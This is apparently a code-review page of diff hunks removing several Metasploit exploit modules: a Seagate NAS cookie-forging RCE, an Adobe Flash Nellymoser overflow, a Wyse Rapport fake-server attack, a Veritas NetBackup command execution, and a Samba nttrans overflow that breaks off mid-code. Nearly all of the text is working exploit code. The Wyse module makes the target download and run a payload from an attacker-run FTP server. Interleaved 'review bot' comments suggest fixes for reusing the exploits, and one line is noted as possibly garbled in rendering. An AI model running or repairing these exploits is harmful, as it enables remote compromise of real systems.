if res.body.include?('Login to BlackArmor')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
# something went wrong, assume safe.
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
#
|
||||
# Executez ze sploitz!
|
||||
#
|
||||
def exploit
|
||||
|
||||
# Step 1 - Establish a session with the target which will give us a PHP object we can
|
||||
# work with.
|
||||
begin
|
||||
print_status("Establishing session with target ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
|
||||
cookie_value = $1.strip
|
||||
else
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
|
||||
# then update it so that it's an admin session before re-encrypting
|
||||
print_status("Upgrading session to administrator ...")
|
||||
php_object = decode_cookie(cookie_value)
|
||||
vprint_status("PHP Object: #{php_object}")
|
||||
|
||||
admin_php_object = set_string(php_object, 'is_admin', 'yes')
|
||||
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
|
||||
vprint_status("Admin PHP object: #{admin_php_object}")
|
||||
|
||||
admin_cookie_value = encode_cookie(admin_php_object)
|
||||
|
||||
# Step 3 - Extract the current host configuration so that we don't lose it.
|
||||
host_config = nil
|
||||
|
||||
# This time value needs to be consistent across calls
|
||||
config_time = ::Time.now.to_i
|
||||
|
||||
begin
|
||||
print_status("Extracting existing host configuration ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
res.body.split("\r\n").each do |l|
|
||||
if l.include?('general_setup')
|
||||
host_config = l
|
||||
break
|
||||
end
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
print_good("Host configuration extracted.")
|
||||
vprint_status("Host configuration: #{host_config}")
|
||||
|
||||
# Step 4 - replace the host device description with a custom payload that can
|
||||
# be used for LFI. We have to keep the payload small because of size limitations
|
||||
# and we can't put anything in with '$' in it. So we need to make a simple install
|
||||
# payload which will write a required payload to disk that can be executes directly
|
||||
# as the last part of the payload. This will also be self-deleting.
|
||||
param_id = rand_text_alphanumeric(3)
|
||||
|
||||
# There are no files on the target file system that start with an underscore
|
||||
# so to allow for a small file size that doesn't collide with an existing file
|
||||
# we'll just prefix it with an underscore.
|
||||
payload_file = "_#{rand_text_alphanumeric(3)}.php"
|
||||
|
||||
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
|
||||
stager = Rex::Text.encode_base64(installer)
|
||||
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
|
||||
vprint_status("Stager: #{stager}")
|
||||
|
||||
# Butcher the XML directly rather than attempting to use REXML. The target XML
|
||||
# parser is way to simple/flaky to deal with the proper stuff that REXML
|
||||
# spits out.
|
||||
desc_start = host_config.index('" description="') + 15
|
||||
desc_end = host_config.index('"', desc_start)
|
||||
xml_payload = host_config[0, desc_start] +
|
||||
stager + host_config[desc_end, host_config.length]
|
||||
vprint_status(xml_payload)
|
||||
|
||||
# Step 5 - set the host description to the stager so that it is written to disk
|
||||
print_status("Uploading stager ...")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
},
|
||||
'vars_post' => {
|
||||
'general_setup' => xml_payload
|
||||
}
|
||||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
end
|
||||
|
||||
print_good("Stager uploaded.")
|
||||
|
||||
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
|
||||
print_status("Executing stager ...")
|
||||
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
|
||||
payload_cookie_value = encode_cookie(payload_php_object)
|
||||
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
|
||||
errored = false
|
||||
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
|
||||
'vars_post' => {
|
||||
param_id => Rex::Text.encode_base64(self_deleting_payload)
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("Stager execution succeeded, payload ready for execution.")
|
||||
else
|
||||
print_error("Stager execution failed (invalid result).")
|
||||
errored = true
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
print_error("Stager execution failed (unable to establish connection).")
|
||||
errored = true
|
||||
end
|
||||
|
||||
# Step 7 - try to restore the previous configuration, allowing exceptions
|
||||
# to bubble up given that we're at the end. This step is important because
|
||||
# we don't want to leave a trail of junk on disk at the end.
|
||||
print_status("Restoring host config ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
},
|
||||
'vars_post' => {
|
||||
'general_setup' => host_config
|
||||
}
|
||||
)
|
||||
|
||||
# Step 8 - invoke the installed payload, but only if all went to plan.
|
||||
unless errored
|
||||
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, payload_file),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Take a CodeIgnitor cookie and pull out the PHP object using the XOR
|
||||
# key that we've been given.
|
||||
#
|
||||
def decode_cookie(cookie_content)
|
||||
cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
|
||||
pass = xor(cookie_value, datastore['XORKEY'])
|
||||
result = ''
|
||||
|
||||
(0...pass.length).step(2).each do |i|
|
||||
result << (pass[i].ord ^ pass[i + 1].ord).chr
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
#
|
||||
# Take a serialised PHP object cookie value and encode it so that
|
||||
# CodeIgniter thinks it's legit.
|
||||
#
|
||||
def encode_cookie(cookie_value)
|
||||
rand = Rex::Text.sha1(rand_text_alphanumeric(40))
|
||||
|
||||
block = ''
|
||||
|
||||
(0...cookie_value.length).each do |i|
|
||||
block << rand[i % rand.length]
|
||||
block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
|
||||
end
|
||||
|
||||
cookie_value = xor(block, datastore['XORKEY'])
|
||||
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
|
||||
vprint_status("Cookie value: #{cookie_value}")
|
||||
|
||||
cookie_value
|
||||
end
|
||||
|
||||
#
|
||||
# XOR a value against a key. The key is cycled.
|
||||
#
|
||||
def xor(string, key)
|
||||
result = ''
|
||||
|
||||
string.bytes.zip(key.bytes.cycle).each do |s, k|
|
||||
result << (s ^ k)
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
#
|
||||
# Simple XML substitution because the target XML handler isn't really
|
||||
# full blown or smart.
|
||||
#
|
||||
def xml_encode(str)
|
||||
str.gsub(/</, '<').gsub(/>/, '>')
|
||||
end
|
||||
|
||||
end
|
|
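Review bot: three issues in the deleted seagate_nas_rce module, relevant if it is re-added elsewhere. `set_string` passes a String, not a Regexp, as the first argument of `gsub` (`"#{prefix}\\d+:\"[^\"]*\""`); a String pattern is matched literally, so `\d+` and `[^"]*` never match and the "value already exists" branch returns the object unchanged, which means a session that already carries a `language` key is not updated; the pattern needs to be built with `Regexp.new` and `Regexp.escape(prefix)`. `decode_cookie` calls `URI.decode`, which was deprecated and then removed in Ruby 3.0; `CGI.unescape`, the counterpart of the `CGI.escape` used in `encode_cookie`, is the replacement. And `xml_encode` as rendered reads `gsub(/</, '<').gsub(/>/, '>')`, a no-op; the original almost certainly substituted `&lt;`/`&gt;` entities and this page view has unescaped them, so the line should be checked against the raw source before reuse.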
@ -1,191 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end

false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end

false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf
@flv = create_flv

super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end

def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset

data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData

tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data

body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize

flv = ''
flv << header
flv << body

flv
end
end

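Review bot: in `create_flv` the trailing `PreviousTagSize` is written as `0xeeeeeeee` although the actual size of `tag1` is 11 + 0x441 = 0x44c, and neither that value nor the `"\xee" * 0x440` fill of `SoundData` carries a comment saying the inconsistency is deliberate; one line noting that these are the malformed fields would keep the next reader from "correcting" them. The `DataSize` bytes `"\x00\x04\x41"` do match the 1 + 0x440 bytes of `data`. Minor: `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` twice; `::File.binread(path)` does the same in one call.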
@ -1,251 +0,0 @@
##
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'timeout'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision: 10998 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => '',
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2009'
))

register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end


def exploit

if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end

# Connect to the target service
print_status("Connecting to the target")
connect()

# Start the FTP service
print_status("Starting the FTP server")
start_service()

# Create the executable with our payload
print_status("Generating the EXE")
@exe_file = generate_payload_exe
if target['Platform'] == 'win'
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"
end
@exe_sent = false

# Start the HTTP service
print_status("Starting the HTTP service")
wdmserver = Rex::Socket::TcpServer.create({
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
})

# Let this close automatically
add_socket(wdmserver)

wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")


fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'

incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"

pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"

pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

if target['Platform'] == 'win'
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)

# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")

if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end

print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")

case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true

when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
end

print_status("Sending reply: #{res}")
session.put(res)
session.close
end
end
rescue ::Timeout::Error
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
return
end

print_status("Waiting on the FTP request...")
stime = Time.now.to_f
while(not @exe_sent)
break if (stime + 90 < Time.now.to_f)
select(nil, nil, nil, 0.25)
end

if(not @exe_sent)
print_status("No executable sent :(")
end

stop_service()
wdmserver.close()

handler
disconnect
end

def on_client_command_retr(c,arg)
print_status("#{@state[c][:name]} FTP download request for #{arg}")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end

c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(@exe_file)
c.put("226 Transfer complete.\r\n")
conn.close
@exe_sent = true
end

def on_client_command_size(c,arg)
print_status("#{@state[c][:name]} FTP size request for #{arg}")
c.put("213 #{@exe_file.length}\r\n")
end


end

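Review bot: `start_service()` brings up the FTP server before `@exe_file = generate_payload_exe` runs, so a SIZE or RETR arriving in that window reaches `on_client_command_size` with `@exe_file` still nil (`@exe_file.length` raises) or `conn.put(nil)` in `on_client_command_retr`; generate the executable first, then start the service. Also `print_status("Received: #{resp}")` is emitted before the `if not resp` guard, so a timeout logs an empty "Received:" line before the error message; move the status line past the guard. The `when /POST/` branch prints "device sending V55 query..." exactly like the `/V55/` branch above it, and its comment talks about PUT while the pattern matches POST; fix one or the other so the log tells the operator which path fired.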
@ -1,97 +0,0 @@
##
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
any source address.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10617 $',
'References' =>
[
[ 'CVE', '2004-1389' ],
[ 'OSVDB', '11026' ],
[ 'BID', '11494' ],
[ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ],

],
'Privileged' => true,
'Platform' => ['unix', 'win', 'linux'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Oct 21 2004',
'DefaultTarget' => 0))
end

def check
connect

sploit = rand_text_alphanumeric(10)
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

sock.put(buf)
banner = sock.get(3,3)

disconnect

if (banner and banner =~ /#{sploit}/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def exploit
connect

sploit = payload.encoded.split(" ")

buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
buf << payload.encoded
buf << "\n"

sock.put(buf)
res = sock.get(-1,3)

print_status("#{res}")

handler
disconnect
end

end

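Review bot: `sploit = payload.encoded.split(" ")` in `exploit` is assigned and never used (the name is borrowed from `check`, where it holds the random echo marker), so drop it. `res = sock.get(-1,3)` can return nil when the service sends nothing back, and `print_status("#{res}")` then prints an empty line with no hint that the read timed out; report the no-response case explicitly, the way `check` already distinguishes a missing banner.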
@ -5,7 +5,7 @@

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

@ -17,13 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.

@ -1,153 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::SMB::Client

def initialize(info = {})
super(update_info(info,
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
'Description' => %q{
This module attempts to exploit a buffer overflow vulnerability present in
versions 2.2.2 through 2.2.6 of Samba.
The Samba developers report this as:
"Bug in the length checking for encrypted password change requests from clients."
The bug was discovered and reported by the Debian Samba Maintainers.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2002-1318' ],
[ 'OSVDB', '14525' ],
[ 'BID', '6210' ],
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
[ "Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))

register_options(
[
Opt::RPORT(139)
], self.class)
end

def exploit

# 0x081fc968

pattern = Rex::Text.pattern_create(12000)

pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded

# 0x081b8138

connect
smb_login

targ_address = 0xfffbb7d0

#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#

subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body

pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])

base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length

pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count

pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand

pkt['Payload'].v['Payload'] = data

self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)

#
# Send a NTTrans secondary request with the magic displacement
#

param = pattern
body = ''
data = param + body

pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])

base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length

pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18

pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset

pkt['Payload'].v['Payload'] = data

